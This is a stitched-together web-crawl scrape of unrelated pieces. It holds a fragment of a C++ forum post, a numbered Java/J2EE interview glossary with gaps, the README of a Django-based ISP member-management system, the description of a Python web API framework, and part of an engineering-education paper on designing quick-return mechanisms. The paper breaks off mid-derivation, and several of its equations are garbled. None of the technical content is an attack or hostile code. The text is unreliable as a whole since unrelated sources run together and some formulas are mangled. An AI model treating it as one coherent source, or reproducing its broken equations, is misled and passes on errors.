for the given values of r1.2750 and therefore r3 0.r1 ) .q 2 b (5) (4) The stroke of the drag-link-driven QR mechanism is double the length O4C.1500 m £ r3 £ 0. With r3 = rlong.3000 m. and r1 is the length between the base pins [1–3]. two values. r3 = 0. the TR can be found as: TR = a p . P. Analytical solution for the value of r3 Solving for q2b in terms of q2a and TR from equation (5) gives: q 2 b = q 2a + (TR .1500 m. 5.154 m and r3 = 0.r ))) 1 (3a) (3b) In terms of q2a and q2b. r4 = rlong yields 0.4000 m yield drag-link mechanisms.430 TR £ 5. or two feasible solutions for r3.1)p/(TR + 1). are found to yield the desired TR = 1.40. ra and rb are the lengths of the other two links. International Journal of Mechanical Engineering Education 32/2 . Again. and r4. substituting the known length values into equation (6) yields 0. values of r3 in the range 0. For the desired stroke of 0. 2 r2 (r4 + r1 ) cos(q 2 a ) = r 2 + (r4 .2 r2 (r4 .sin f sin q 2 a ] = 2 r4 r1 r2 (10) Letting A = (r4 + r1) . B = (r4 .: International Journal of Mechanical Engineering Education 32/2 . and C = 2r4r1/r2 allows equation (10) to be expressed as: A cos q 2 a + B sin q 2 a = C which has the following q2a solutions [9]: q 2 a = atan 2(B.Quick-return mechanisms 107 Fig. With q2a known.r1 ) cos(q 2 b ) 2 2 2 2 (8) Cancelling the common r22 term. Equating the right-hand sides of equations (2a) and (2b) eliminates r3 and yields: r 2 + (r4 + r1 ) .r1) sin f. two solutions for q2a can be resolved.(r4 .C 2.r1 )[cos f cosq 2 a .2 r2 (r4 . equation (2b) can be solved for r3. From equation (11). 5 TR values for feasible range of r3.(r4 .r1) cos f.e.r1 ) . substituting for q2b from equation (7). A) ± atan 2( A 2 + B 2 . C) (12) (11) where atan 2 (numerator.(r4 . i. if A2 + B2 > C2. equation (9) becomes: (r4 + r1 ) cosq 2 a .r1 ) 2 2 (9) Simplifying and using the angle sum relationship for cosine [8].r1 ) cos(q 2 a + f ) = (r4 + r1 ) . and grouping the cosine terms on the left-hand side gives: 2 r2 (r4 + r1 ) cos q 2 a . denominator) denotes a quadrant corrected arctangent function. one. 6 Force transmission angles at: (a) TDC and (b) BDC. depending on the desired TR value. r3 = ± r 2 + (r4 + r1 )2 . i. to prevent binding of the links.2504 m. The minimum and maximum transmission angles for a drag-link mechanism occur when the follower is aligned with the base link.C2 = 0. there is only one solution for q2a and therefore only one potential solution for r3. 6a.500 and the given length values. A minimum transmission angle of 30° has been suggested [1].18° or 39.e. for the illustrated draglink-based QR mechanism the minimum/maximum transmission angles occur at TDC and BDC.: r 2 = r 2 + (r4 + r1 ) . Referring to Fig.1544 m or 0. An ideal transmission angle is 90°. These results confirm the r3 results found iteratively above..2 r3 (r4 + r1 ) cosg TDC 2 3 2 (14) Fig. respectively. P. Selecting the preferred value for r3 The transmission angle of a mechanism determines the effectiveness it will have in driving its payload.38° and r3 = 0. gTDC. or two solutions for r3. i. When C2 > A2 + B2 there is no real solution for q2a and therefore no solution for r3. Therefore.108 R. The solutions for r3. Therefore. if A2 + B2 > C2. however. higher transmission angles are preferred. International Journal of Mechanical Engineering Education 32/2 . In any case. there may be zero. When A2 + B2 . can be resolved through cosine law. two feasible solutions for r3 can exist. 
Selecting the preferred value for r3

The transmission angle of a mechanism determines the effectiveness it will have in driving its payload. An ideal transmission angle is 90°. To prevent binding of the links, a minimum transmission angle of 30° has been suggested [1], as has 45° [2, 3]; in general, higher transmission angles are preferred. The minimum and maximum transmission angles for a drag-link mechanism occur when the follower is aligned with the base link. Therefore, for the illustrated drag-link-based QR mechanism, the minimum/maximum transmission angles occur at TDC and BDC (Fig. 6: force transmission angles at (a) TDC and (b) BDC). Referring to Fig. 6a, the transmission angle at TDC, γTDC, can be resolved through the cosine law, i.e.:

    r2^2 = r3^2 + (r4 + r1)^2 - 2 r3 (r4 + r1) cos γTDC    (14)

and therefore:

    γTDC = arccos[(r3^2 + (r4 + r1)^2 - r2^2) / (2 r3 (r4 + r1))]    (15)

Similarly, referring to Fig. 6b, BDC yields:

    r2^2 = r3^2 + (r4 - r1)^2 - 2 r3 (r4 - r1) cos γBDC    (16)

giving:

    γBDC = arccos[(r3^2 + (r4 - r1)^2 - r2^2) / (2 r3 (r4 - r1))]    (17)

The minimum transmission angle is γmin = min(γTDC, γBDC). The known link lengths and the found values of r3 yield γmin(r3 = 0.1544) = min(10.6°, 85.9°) = 10.6° and γmin(r3 = 0.2504) = min(35.6°, 60.8°) = 35.6°. Since the first candidate falls well below the suggested 30° minimum, r3 = 0.2504 m is the preferred solution.

Discussion issues

(1) As seen by the TR calculations for potential r3 values in Fig. 5, either zero, one, or two r3 values may exist, depending on the desired TR value.
(2) A range of TR values, 1.430 <= TR <= 3.538, exists for the range of feasible r3 lengths in drag-link mechanisms.
(3) If both the base length O2–O4 and the coupler length, r3, were adjustable, a single order of infinity of solutions would exist for a given TR.
(4) As seen in solving for the preferred value of r3, the minimum transmission angle can be critical in the isolation of a unique mechanism design.

Analysis of the kinematics

Solving for the slider velocity

Known: θ2 = 60°, ω2 = 10 rad/s, α2 = 0 rad/s2, O2A = r2 = 0.2250 m, AB = r3 = 0.2504 m, O4B = r4 = 0.2750 m, O4C = r5 = 0.2500 m and CD = r6 = 0.3000 m. Fig. 7a depicts the mechanism with the link lengths required to achieve a TR = 1.500. Using relative velocity analysis:

    VB = VA + VB/A    (18)
    VD = VC + VD/C    (19)

The relative velocity equations above are solved in sequence and each has two unknown quantities. Table 1 describes the known and unknown vector components for the equations. In Table 1 the symbol ⊥ is used to denote perpendicular and the symbol ? is used to denote an unknown quantity.

TABLE 1 Known and unknown velocity components
VA: magnitude (|ω2|) O2A = 2.250, direction 150° (i.e. ⊥ to O2A)
VB/A: magnitude ?, direction ⊥ to AB
VB: magnitude ?, direction ⊥ to O4B
VC: found by velocity image
VD/C: magnitude ?, direction ⊥ to DC
VD: magnitude ?, direction horizontal (sliding direction)

The unknowns may be resolved using the graphical method shown in Fig. 7b (the velocity polygon). Table 2 summarizes the magnitudes found from Fig. 7b.

TABLE 2 Velocity magnitudes (m/s)
VB/A: 1.898; VB: 3.631; VC: 1.756; VD/C: 1.219; VD: 1.075

Solving for the slider acceleration

Using relative acceleration analysis:

    aB = aB_n + aB_t = aA + aB/A = aA_n + aA_t + aB/A_n + aB/A_t    (20)
    aD = aD_n + aD_t = aC + aD/C = aC_n + aC_t + aD/C_n + aD/C_t    (21)

The relative acceleration equations above are solved in sequence and each has two unknown quantities. Table 3 describes the known and unknown vector components for the equations. For Table 3 it has been noted that the magnitude of aA_t is zero since α2 = 0 rad/s2, and that the magnitude of aD_n is also zero since the piston D slides on a straight surface.

TABLE 3 Known and unknown acceleration components
aA_n: magnitude ω2^2 O2A = 22.50 m/s2, direction parallel to O2A (directed towards O2)
aB/A_n: magnitude ||VB/A||^2/AB = 14.39 m/s2, direction parallel to AB (directed towards A)
aB/A_t: magnitude ?, direction ⊥ to AB
aB_n: magnitude ||VB||^2/O4B, direction parallel to O4B (directed towards O4)
aB_t: magnitude ?, direction ⊥ to O4B
aC: found by acceleration image
aD/C_n: magnitude ||VD/C||^2/CD, direction parallel to CD (directed towards C)
aD/C_t: magnitude ?, direction ⊥ to CD
aD: magnitude ?, direction horizontal (sliding direction)

The unknowns may be solved for using the graphical construction shown in Fig. 7c (the acceleration polygon). Measuring from Fig. 7c, the magnitude of aD is 21.7 m/s2, with its direction being to the left. (Fig. 7: analysis of kinematics at θ2 = 60°: (a) required drag-link QR mechanism, (b) velocity polygon and (c) acceleration polygon.)

Computer-aided analysis

The drag-link-driven QR mechanism is a two-loop, single-input mechanism; the angular displacement, velocity, and acceleration of vector 2 are the mechanism's inputs. Vectors can be used to represent the mechanism's links, as illustrated in Figure 8a (vector model of the drag-link QR mechanism). Table 4 summarizes the vector model used to model the mechanism (the initial vector lengths and angles, the loop sequences, the common variable pairs and the dependent variables). The mechanism has been simulated on GNLINK and Working Model®. With this model, Figure 8b shows a motion simulation of the mechanism through a full rotation. Table 5 presents the GNLINK kinematic results output for θ2 = 60°. The results are identical, to three significant figures, to those found graphically using AutoCAD® above (Fig. 7).

Further considerations

On the accuracy of the graphical velocity and acceleration solutions

The high accuracy achieved in the graphical analysis of velocity and acceleration values is due to the use of a computer-aided drawing package. While not mandatory, approximately 60% of the students utilize such packages and achieve similar accuracy.

On the theory of mechanisms laboratory and the format and value of the labs

The laboratory used for the theory of mechanisms class has a reconfigurable mechanism testbed, which allows the construction and running of different mechanism types, including the drag-link-based QR. Also found in the laboratory are a cut-away five-speed manual transmission and various scales and knife edges to allow the determination of the inertia properties of links. In addition, the laboratory has several PC-based computers running mechanism simulation software, including GNLINK, the program used in this work, and CAMPRF [10], a cam-profile-design program.

Students are divided into groups of three for the laboratories. Each group has access to the laboratory for approximately one hour per week. Over the 13 weeks of the term, students are currently scheduled to complete the following four lab projects:
(1) Design and analysis of a QR mechanism.
(2) Observation and calculation of gear reduction ratios.
(3) Design and analysis of cam and follower systems.
(4) Approximate modelling and physical determination of inertia properties.
The timing of the specific projects coincides with the material coverage in the course.

On the manual for the QR project

The laboratory manual for the QR project basically consists of the information found within the introductory sections of this paper. While the background remains the same, the type of mechanism featured in the project varies from year to year.

Conclusions

Having a project related to QR mechanism design and analysis is very beneficial to the students. Since the task of a QR mechanism and the kinematic analysis involved in the project are basic, the project functions very well within the first four weeks of a first course on the theory of mechanisms to strengthen student understanding of the taught material. The experience familiarizes the students with the terminology of mechanisms, with concepts related to mechanism synthesis, with relative motion analysis, and with techniques and computer programs for the design and analysis of mechanisms.

Acknowledgement

The undergraduate students of the Department of Mechanical Engineering, University of Victoria, are thanked for providing effective feedback on the QR mechanism project.

References
[1] A. G. Erdman and G. N. Sandor, Mechanism Design - Analysis and Synthesis, 3rd edn (Prentice Hall, Upper Saddle River, NJ, 1997).
[2] J. E. Shigley and J. J. Uicker, Jr., Theory of Machines and Mechanisms, 2nd edn (McGraw-Hill, New York, 1995).
[3] H. H. Mabie and C. F. Reinholtz, Mechanics and Dynamics of Machinery, 4th edn (John Wiley & Sons, New York, 1987).
[4] Canadian Engineering Accreditation Board (CEAB), Accreditation Criteria and Procedures (Canadian Council of Professional Engineers, Toronto, 2000).
[5] W. L. Cleghorn and R. P. Podhorodeski, 'Multiple-loop mechanism analysis using a microcomputer', Proc. of the 9th Applied Mechanism Conference (Kansas City, MO, October 1985), pp. V1-V7.
[6] Knowledge Revolution, Working Model 2D - User's Manual (1996).
[7] E. A. Dijksman, Motion Geometry of Mechanisms (Cambridge University Press, 1976).
[8] D. Zwillinger, ed., CRC Standard Mathematical Tables and Formulae, 30th edn (CRC Press, 1996).
[9] J. J. Craig, Introduction to Robotics - Mechanics and Control, 2nd edn (Addison-Wesley, 1986).
[10] W. L. Cleghorn and R. P. Podhorodeski, 'Disc cam design using a microcomputer', Int. J. Mech. Engng Educ., 16(4) (1988), 235-250.
https://pt.scribd.com/doc/37246468/s2-15
CC-MAIN-2017-09
en
refinedweb
In the programming world (particularly in the realm of C#), a delegate is an anonymous function pointer, which allows a function or method to be fully encapsulated and passed as an argument to other functions. The main benefit of using a delegate is that it allows for cleaner divisions of functionality among objects. Delegates have obvious applications in threading and event handling. For a more general explanation of how delegates apply to events, have a look at ariels' node on callbacks.

public delegate void my_delegate(string message);

This defines a new delegate type named "my_delegate" which points at a method with one string argument and which returns nothing (void). This type can then be instantiated using the standard new operator, giving the method for the delegate to point at as an argument.

using System;

class Foo
{
    public void my_method(string message)
    {
        Console.WriteLine("my_method: " + message);
    }

    public delegate void my_delegate(string message);

    public static void Main(string[] args)
    {
        Foo my_obj = new Foo();
        my_delegate foo = new my_delegate(my_obj.my_method);
        foo("hello");
    }
}

Of course, delegates are pretty much obsolete in any language which has a lambda construct such as Lisp or Ruby.

In OpenStep (and deriving technologies such as GNUStep and Cocoa), a delegate is an object that acts on behalf of another object. They're typically used to implement things that respond to various kinds of user or system signals. A typical example found in many programs is the application delegate. You can create a new class, for example, MyAppDelegate, and set it as the application's delegate with [NSApp setDelegate: [MyAppDelegate new]];. Now, you can implement methods in MyAppDelegate that respond to NSApplication's messages - for example, if you need to do something when the application starts up, you can implement the method - (void)applicationDidFinishLaunching: (NSNotification *)not; in the delegate class.

Another typical example is the window delegate. Likewise, by using NSWindow's setDelegate: method (or setting the delegate in the interface builder of your choice), you can implement a class that responds to window signals. For example, the windowShouldClose: method would be called to determine whether or not the window can be closed.

One sent by any constituency to act as its representative in a convention; as, a delegate to a convention for nominating officers, or for forming or altering a constitution. Court of delegates, formerly, the great court of appeal from the archbishops' courts and also from the court of admiralty. It is now abolished, and the privy council is the immediate court of appeal in such cases. [Eng.] © Webster 1913.

Del"e*gate (?), a. [L. delegatus, p. p.] Sent to act for or represent another; deputed; as, a delegate judge. Strype.

Del"e*gate (?), v. t. [imp. & p. p. Delegated (?); p. pr. & vb. n. Delegating (?).]
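Returning to the programming sense above: the remark that delegates are largely unnecessary in lambda-equipped languages can be made concrete. As a rough Python illustration (added here for comparison; it is not part of the original write-up), functions are first-class values, so no delegate type is needed:

def my_method(message):
    print("my_method: " + message)

# The function object itself plays the role of the delegate instance.
foo = my_method
foo("hello")

# Passing behaviour into another function, the typical delegate use case:
def run_callback(action):
    action("hello from a callback")

run_callback(my_method)
run_callback(lambda msg: print("lambda: " + msg))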
http://everything2.com/title/delegate
CC-MAIN-2017-09
en
refinedweb
A method that returns Task<T> implies that some caller is wanting to "await" on the result. This is particularly true when unit testing, because you probably need the result value to test against! In VS11 Beta, MS-Test now supports creating test methods that are marked async and that can therefore use the await keyword inside the method body. Here is an example:

[TestMethod]
public async Task MyAsyncTest()
{
    var result = await SomeLongRunningOperation();
    Assert.IsTrue( result );
}

The new Fakes framework can generate stub types for your interfaces. Here is an example of a test that uses a generated stub:

[TestMethod]
public void GetValue()
{
    var stub = new StubIGenericMethod();
    stub.GetValueOf1 = () => 5;
    IGenericMethod target = stub;
    Assert.AreEqual(5, target.GetValue());
}

What SKUs is Fakes available with? I noticed in the MSDN documentation for Shims it mentions the IntelliTrace profiler, suggesting it's only available with Ultimate. Martin

@Martin Costello – The Fakes framework is available in the Premium and Ultimate VS11 SKUs.

Saw your VS 11 ALM / Unit Testing session at the MVP Summit. Great work going on in this space. I've been playing with the UTE on a legacy project this week (1431 unit tests) and the performance is really good. However, usability wise, you have definitely identified three of the key areas that still need work: grouping/sorting, hard-to-see test details, and details select/copy to clipboard. The biggest one for us is the grouping/sorting. With our 1431 tests, many of which have the same test method names, it is really hard to find an interesting subset of tests to run/debug. At the very least, give us the ability to list tests by ClassName.TestMethodName. That would help a lot. Anyway, it really is awesome that you guys are investing so much in unit testing for VS 11.

@Keith Hill – Yeah, we're working hard on these usability things, so expect lots of improvements there over time. Thanks for the feedback, please keep it coming.

Very useful, thanks.

You say that you are working hard on "these usability things" like grouping/sorting [which is great news], but I notice that Keith Hill's Connect issue on this [Bug 729524] has already been closed as Deferred. I think that is more than just a minor usability inconvenience for folks with non-trivial numbers of tests to manage, especially if launching single tests from the editor is also missing. Does "working hard" on a "closed as deferred" issue mean "will be in the next release," I hope?

Hi Peter, When I run code coverage on the assemblies it's instrumenting my test dll too. I've specified a testsettings file which has only the "real" code assembly selected in the diagnostics section, set this from the Unit Test menu and specified this in my build process, but it seems to be ignored by both TFS 11 and VS 11. Is there a reason for this? My thanks for getting MSTest playing nicely with F#, that was a very pleasant surprise. Cheers

@Dylan – Except for Dev10 back-compat scenarios, the .testsettings file is really for configuring your TeamBuild. Our Code Coverage runs over everything. Is that an issue? Can you help me understand why you wouldn't want to see code coverage on the test projects too (I know I do). Thanks!

@Byron Jennings – If you look in my "We are working on it" section you will see that I did say we are actually working on this right now. We have to use "Deferred" as the Connect way of saying "We put this on our backlog and are working on it." If you look at Ian's comment in Keith's bug, you will see he says we are going to get this done very soon. Trust me, we want this as bad as you guys do.
Can you confirm that Post Build Test Run is in Ultimate edition only, as mentioned here?

Hi Peter, I guess I just never have run code coverage on unit tests. It seems a bit odd to me that you'd want to do that. Take a test that sets a flag to true if a particular method gets invoked (ignore just calling Verify on Moq for brevity here). I want the test to assert that the flag is false. The code in the callback should never get hit in a passing test, which lowers the code coverage metric. And for people that are all jacked up about the numbers, having lowered code coverage could start a minor panic. I'll have a think about it and see, but I take your point that you probably do want to have code coverage on your tests, and I realize that you can see how much coverage a particular assembly has in the report. Just as an aside, is there a way to view the code coverage from builds in a report?

Sorry if this is a dumb question, but for the 'Generate Unit Test Wizard', could the old version (or something like it) be made available as a NuGet package for those using MSTest? (Perhaps then with a name of 'Generate MSTest Unit Tests'?) If it could be made available as an open-source project, then even if the existing source is MSTest-specific, maybe others could make it work for other testing frameworks, or worst-case fork it and make modified versions for the other frameworks?

One thing I really like about the nUnit test runner app is how it groups tests. It would be nice to have a similar view: presenting a grouping/hierarchy view where the assembly is the top level, followed by a level for each namespace element, then by class name, and finally by the test name itself. The tool also provides the ability to select any level of the hierarchy and run tests for all its children (or itself if it is a leaf node).

Is Code Coverage Coloring supposed to work for native code in the v11 Beta?

In my software engineering role, I often create libraries that contain many internal mathematical routines which are behind the public face of the library. It is very important to have robust automated unit tests for these routines to ensure the integrity of the library. For reasons that are beyond the scope of this post, it is impractical to unit test solely at the public member layer, and many of the internal routines have little or no meaning outside the context of the library in which they reside. Sometimes a private method is created to increase the maintainability and readability of an otherwise inscrutable computation. Consequently I found the 'private accessor' feature set quite effective in reducing the amount of custom scaffolding created to support testing, and I am disappointed at its termination in the latest version of Visual Studio. I know that some have argued that unit tests should only be constructed for public members, but I would suggest that while that may be a good practice in most cases, it is a bad practice in some cases. Well, this post is already too long and I have some test scaffolding to write.

In 2010 you could add a data source via a wizard in the properties window. Is this something that is going to be implemented?

I can't believe you seriously took out the Generate Unit Tests functionality before you implemented an alternative… I use that almost daily in 2010. What exactly is wrong with being coupled with MSTEST? Isn't it the MS Unit Testing Framework?
I don't see you guys dropping the EF designer because it's tightly coupled to Entity Framework, so you can figure out a way to both support it and NHibernate. This is a really useful and productive tool to leave out of the new edition; I can't believe you left it out and thought no-one would miss it! Please put it back in, or give us something else as an alternative; just because it's hard doesn't mean it's not worth doing. Thanks.

Disappointed that the right-click Create Unit Test option has been removed. I will not upgrade to Visual Studio 2012 as a result.

Jobin, Try reading this workaround and see what you think.
https://blogs.msdn.microsoft.com/visualstudioalm/2012/03/08/whats-new-in-visual-studio-11-beta-unit-testing/
CC-MAIN-2017-09
en
refinedweb
Hi all,

I have a list of compound names for which I want to retrieve PubChem CIDs. To achieve this I wrote a Biopython script as follows, but it doesn't seem to be working:

from Bio import Entrez
Entrez.email = "[email protected]"
infile = open("data", "r")
out_put = open("ids_data.csv","w")
for line in infile.readlines():
    single_id = line
    #Post list of ids to database
    handle= Entrez.epost("pccompound",names=single_id)
    record = Entrez.read(handle)
    #history
    webEnv=record["WebEnv"]
    queryKey=record["QueryKey"]
    #Retrieving information
    data = Entrez.esummary(db="pccompound",webenv=webEnv,query_key=queryKey)
    res=Entrez.read(data)
    for compound in res:
        Name = compound["SynonymList"]
        Cid = compound["Id"]
        print "%s:%s" %(Name,Cid)
        out_put.write("%s:%s\n" %(Name,Cid))
out_put.close()

Ideally I want output as follows:

Biruvidine : 446727

Can anybody help? Thanks in advance

Nit

Can you fix the formatting? The example is very hard to read, and you didn't show the current output. It sounds like given a PubChem identifier like SID 74891762 you want to get back 'Brivudine: CID446727' - is that right?

Can you fix the formatting? The example is very hard to read. And what do you mean by "it doesn't seem to be working"? What is the error message, if any?

Thanks for fixing the formatting. Could you also include an example of the text in ids_data.csv so we have both sample input AND the desired output?
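One possible direction (a hedged sketch added here, not a tested answer from the thread): epost expects numeric UIDs, so free-text compound names can instead be looked up with esearch, which accepts a query term:

from Bio import Entrez

Entrez.email = "[email protected]"

def name_to_cids(name):
    # esearch accepts a free-text term, unlike epost, which expects UIDs
    handle = Entrez.esearch(db="pccompound", term=name)
    record = Entrez.read(handle)
    return record["IdList"]

# "brivudine" is used as an illustrative name, following the comment above
for name in ["brivudine"]:
    print("%s : %s" % (name, ",".join(name_to_cids(name))))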
https://www.biostars.org/p/19016/
CC-MAIN-2017-09
en
refinedweb
Spring Security Java Config Preview: Readability In this post, I will discuss how to make your Spring Security Java configuration more readable. The post is intended to elaborate on a point from Spring Security Java Config Preview: Web Security where I stated: By formatting our Java configuration code it is much easier to read. It can be read similar to the XML namespace equivalent where "and()" represents optionally closing an XML element. Indentation The indentation of Spring Security's Java configuration really impacts its readability. In general, indentation like a bullet list should be preferred. For a more concrete example, take a look at the following code: http // #1 .formLogin() // #2 .loginPage("/login") .failureUrl("/login?error") // #3 .and() // #4 .authorizeRequests() // #5 .antMatchers("/signup","/about").permitAll() .antMatchers("/admin/**").hasRole("ADMIN") .anyRequest().authenticated(); - #1 formLogin updates the http object itself. The indentation of formLogin is incremented from that of http (much like the way the <form-login> is indented from <http>) - #2 loginPage and failureUrl update the formLogin configuration. For example, loginPage determines where Spring Security will redirect if log in is required. For this reason, each is a child of formLogin. - #3 and means we are done configuring the parent (in this case formLogin). This also implies that the next line will decrease indentation by one. When looking at the configuration you can read it as: http is configured with formLogin and authorizeRequests. If we had nothing else to configure, the and is not necessary. - #4 We decrease the indentation with authorizeRequests since it is not related to form based log in. Instead, its intent is to restrict access to various URLs. - #5 Each antMatchers and anyRequest modifies the authorization requirements for authorizeRequests. This is why each is a child of authorizeRequests. IDE Formatters The indentation may cause problems with code formatters. Many IDE's will allow you to disable formatting for select blocks of code with comments. For example, in STS/Eclipse you can use the comments of @formatter:off and @formatter:on to turn off and on code formatting. An example is shown below: // @formatter:off http .formLogin() .loginPage("/login") .failureUrl("/login?error") .and() .authorizeRequests() .antMatchers("/signup","/about").permitAll() .antMatchers("/admin/**").hasRole("ADMIN") .anyRequest().authenticated(); // @formatter:on For this feature to work, make sure you have it enabled: - Navigate to Preferences -> Java -> Code Style -> Formatter - Click the Edit button - Select the Off/On Tags tab - Ensure Enable Off/On tags is selected - You can optionally change the strings used for disabling and enabling formatting here too. - Click OK Comparison to XML Namespace Our indentation also helps us relate the Java Configuration to the XML namespace configuration. This is not always true, but it does help. Let's compare our configuration to the relevant XML configuration below. http .formLogin() .loginPage("/login") .failureUrl("/login?error") .and() .authorizeRequests() .antMatchers("/signup","/about").permitAll() .antMatchers("/admin/**").hasRole("ADMIN") .anyRequest().authenticated(); The relevant, but not equivalent, XML configuration can be seen below. Note that the differences between how Spring Security will behave between these configurations are due to the different default values between Java Configuration and XML configuration. 
<http use-expressions="true">
    <form-login login-page="/login"
        authentication-failure-url="/login?error"/>
    <!-- similar to and() -->
    <intercept-url pattern="/signup" access="permitAll"/>
    <intercept-url pattern="/about" access="permitAll"/>
    <intercept-url pattern="/admin/**" access="hasRole('ROLE_ADMIN')"/>
    <intercept-url pattern="/**" access="authenticated"/>
</http>

- The first thing to notice is that the http and <http> are quite similar. One difference is that Java Configuration uses authorizeRequests to specify use-expressions="true".
- formLogin and <form-login> are quite similar. Each child of formLogin is an XML attribute of <form-login>. Based upon our explanation of indentation, the similarities are logical since XML attributes modify XML elements.
- The and() under formLogin is very similar to ending an XML element.
- Each child of authorizeRequests is similar to each <intercept-url>, except that Java Configuration specifies requires-channel differently, which helps reduce configuration in many circumstances.

Summary You should now know how to consistently indent your Spring Security Java Configuration. By doing so your code will be more readable and be easier to translate to and from the XML configuration equivalents.
http://spring.io/blog/2013/07/11/spring-security-java-config-preview-readability/
CC-MAIN-2017-09
en
refinedweb
pthread_mutexattr_destroy - Destroys the specified mutex attributes object.

DECthreads POSIX 1003.1c Library (libpthread.so)

#include <pthread.h>

int pthread_mutexattr_destroy( pthread_mutexattr_t *attr);

Interfaces documented on this reference page conform to industry standards as follows: IEEE Std 1003.1c-1995, POSIX System Application Program Interface

attr: Mutex attributes object to be destroyed.

This routine destroys a mutex attributes object - that is, the object becomes uninitialized. Call this routine when your program no longer needs the specified mutex attributes object. After this routine is called, DECthreads may reclaim the storage used by the mutex attributes object. Mutexes that were created using this attributes object are not affected by the destruction of the mutex attributes object. The results of calling this routine are unpredictable if the attributes object specified in the attr argument does not exist.

If an error condition occurs, this routine returns an integer value indicating the type of error. Possible return values are as follows: 0 - successful completion; [EINVAL] - the value specified by attr is invalid.

Errors: None

Functions: pthread_mutexattr_init(3)

Manuals: Guide to DECthreads and Programmer's Guide
http://backdrift.org/man/tru64/man3/pthread_mutexattr_destroy.3.html
CC-MAIN-2017-09
en
refinedweb
I have a file that contains integers organized into rows and separated by whitespace. Both the number and length of the rows are unknown. I'm currently iterating over the file line-by-line, and I'm trying to iterate over each line character-by-character but I'm having some trouble. I'm currently storing the contents of each line into a string, but I suspect that's not the best way, and I'm hoping someone can point me in the right direction. Here's my current code which simply prints each line in the file: std::string filename = "values.txt"; std::ifstream file(filename.c_str()); std::string line; while (std::getline(file, line)) { std::cout << line << std::endl; } for line in file: for char in line: print char You're almost there; you can use formatted stream extraction to read integers, using a string stream to represent each line: #include <fstream> #include <sstream> #include <string> // ... for (std::string line; std::getline(infile, line); ) { std::istringstream iss(line); for (int n; iss >> n; ) { std::cout << "Have number: " << n << "\n"; } std::cout << "End of line\n"; } Error checking can be added by checking whether the entire string stream has been consumed.
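For comparison with the Python-style loop sketched in the question, the equivalent token-by-token read looks like this (an illustrative aside, not part of the original answer; the filename follows the question's values.txt):

# Python equivalent of the C++ answer above
with open("values.txt") as f:
    for line in f:
        for token in line.split():   # split on any whitespace
            n = int(token)           # one integer at a time, like `iss >> n`
            print("Have number:", n)
        print("End of line")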
https://codedump.io/share/xirgep0LCbZJ/1/how-to-iterate-over-a-line-in-a-file
CC-MAIN-2017-09
en
refinedweb
By Louis F. (Intel). The Embree project pages already include detailed instructions on how to get the source code, build, and run Embree with the example scenes. This series of blog articles will focus on the usage of Embree from a developer's perspective. I have been using Embree on Linux, but all information presented here should be relevant as well if you use other environments (Windows/Mac). Embree 2.0 was a dramatic change from version 1.0: it added support for Intel Xeon Phi and used Intel ISPC as the primary SIMD programming language for packet ray tracing. Embree 2.1 is also quite a bit of a change from 2.0: it introduced a new kernel API that supports user extensions on primitive types, instancing, as well as more flexible ways to structure the scene. Since version 1.0, Embree has always bundled the kernels with an example path tracer. This also changed in version 2.1, where the kernels were released separately from the reference path tracing renderer. All of this is a lot of information to absorb, but I will try to cover it in the subsequent blogs. In the first couple of blogs I will discuss the reference implementation of the Embree renderer. The motivation is to allow someone unfamiliar with Embree to quickly experiment with various aspects of the renderer and the underlying kernels. After all, without a renderer, one can do little with just the kernels. Another important reason is that a highly optimized kernel requires a highly optimized renderer to reach its full potential. The Embree renderer is a good example of how to efficiently drive these kernels. The Embree Render Devices After you check out the embree and embree-renderer source code from the github repository, follow the README.txt instructions in both projects to build them. Once they are built and properly set up so that the renderer can find the kernel libraries, you should be able to run this successfully: renderer -c ../models/cornell_box.ecs You should see a render window pop up. The entry point to the renderer is in /devices/renderer/renderer.cpp. This is an excellent place to learn how to drive the Embree renderer at a high level. Most code in Embree is under the namespace "embree". At the beginning of renderer.cpp, a list of global states and their default values are defined, followed by a number of functions which parse the command line options to initialize these global states. It's best to look at the *.ecs files (which are plain text) in the context of the command line parsers in the renderer.cpp file. You will understand how the options are passed on to the renderer. One of the key concepts of the renderer API is the render Device interface. A derived class of Device implements the Embree renderer API, which is specified in /devices/device/device.h. The benefit of having this API is that the renderer does not have to worry about where the computation is actually occurring (Xeon or Xeon Phi, local or remote). There are currently four devices implemented in the renderer: - COIDevice in /device/device_coi - ISPCDevice in /device/device_ispc - NetworkDevice in /device/device_network - SingleRayDevice in /device/device_singleray The ISPCDevice is a complete implementation of a path tracer with lights and materials. It's written in ISPC, which can be compiled to target Intel Xeon and Xeon Phi. It can also be set to use SSE, AVX, or Xeon Phi 512-bit SIMD instructions at compile time. 
The ISPCDevice utilizes the packet and hybrid ray tracing kernels, where SIMD is used to operate on multiple rays during traversal tests. In contrast, although the SingleRayDevice is also a complete implementation of the path tracer, it operates on single rays. Its renderer features are very similar to the ISPCDevice; this renderer is mostly refactored from Embree 1.0. The NetworkDevice is a communication device that abstracts the actual compute device (a processor on a remote machine). It handles data transfer between the local and remote machines through a network socket. A renderer_server binary is built from this device and should be run on the remote machine to listen for incoming render requests. Behind the scenes, the NetworkDevice uses the other devices (ISPCDevice, SingleRayDevice) to do the actual rendering. The COIDevice is similar to the NetworkDevice in that it abstracts communication over the Xeon Phi Common Offload Infrastructure (COI) API. This device allows the renderer to pass data onto the Xeon Phi for rendering. Behind the scenes, it spawns an ISPCDevice process on the Xeon Phi. So this is a quick overview of Embree 2.1 and its renderer devices. In the next blog, we will look at some of them in more detail and see what you can do with the renderer.
https://software.intel.com/en-us/blogs/2014/01/24/introduction-to-embree-21-part-1?language=ru
CC-MAIN-2017-09
en
refinedweb
I am trying to run a Python script using a WebJob in Azure, but I am getting a "module not found" error. When I tried to run the pip command to install the missing modules (beautifulsoup, mechanize, python-mpns), it said "Access denied". I also tried to change the folder permissions using os.chmod and to run python setup.py install, but got:

[11/11/2016 18:17:35 > e1c140: ERR ] chmod: changing permissions of 'D:\Python27\Lib\site-packages/setuptools/....pyc': Permission denied
[11/11/2016 18:17:38 > e1c140: INFO] error: could not create 'D:\Python27\Lib\site-packages\mpns': Access is denied

I also tried installing with the --user flag:

def install(pack):
    pip.main(['install', "--user", pack])

So this is what worked for me (for Azure Functions, but they are similar to WebJobs and they even use the same SDK). I've copied the wheel package of the module in question to the same GitHub repo where the Function code was, and added the following code to the Function initialization:

import os,pip,sys,time
try:
    import pyodbc
except:
    package = 'pyodbc-3.0.10-cp27-none-win32.whl'
    pip.main(['install', '--user', package])
    raise ImportError('Restarting')

You could obviously copy the wheel package any other way, I just found this way convenient enough.
